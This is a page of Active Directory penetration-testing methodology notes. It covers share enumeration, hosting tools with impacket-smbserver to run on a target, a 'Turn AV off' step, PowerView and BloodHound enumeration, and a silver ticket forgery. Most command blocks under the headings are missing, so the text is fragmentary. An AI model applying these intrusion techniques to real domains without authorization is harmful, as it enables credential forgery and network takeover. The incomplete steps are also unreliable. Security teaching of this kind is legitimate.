Methodology
This Page shows the Complete methodology for Active Directory Pentesting
Enumerating AD Environment
Listing Shares on Windows
## view the shares
net view \\Computername.abc.corp
## List the Shares
dir \\computer-name.abc.corp Impacket-SmbServer to Host Files
We can use impacket-smbserver to host files as well and Run files from this share as well.
impacket-smbserver -smb2support -user test -password test share $(pwd)
### without password
impacket-smbserver -smb2support share $(pwd) then on Target windows machine, we need to connect to this share and run our tools.
net use \\IP_add_of_kali\shareTurn AV off
PowerView Enumerating Basic Stuff
Enumerate AD Users
Only Get-DomainUser command will print very Long info so you can use below command to filter just the usernames
Enumerating AD Computers
This command will get all of the computer names in the Domain.
Enumerating Domain Admins Group
Enumerating Domain Admins Group Members
Enumerating Enterprise Admins Group Members
PowerView Enumerating Advanced
Enumerating ACL's
Enumerating Organizational Unit (OU)
Tools and Commands
Powerup.ps1
To Invoke any abuse function with your own username you can use below command.
Bloodhound-python
We can use bloodhound to enumerate the domain if we have a valid set of credentials, we can use bloodhound.py kali linux script to do some enumeration
Rubeus Commands.
Runas Command
PS-Session and Cred Object
Silver Ticket Attack
In a silver ticket attack, the attacker can forge a valid TGS (Ticket granting Service) and then attacker can access that service using that TGS.
For this attack we need the NTLM hash of the service account user. for this we can use online tools, or below python code
For Domain SID we can use
now we have both NTLM hash and the Domain SID so we can craft the Silver Ticket Attack, for this i like to use Impacket-ticketer
this will create a administrator.ccache file
Last updated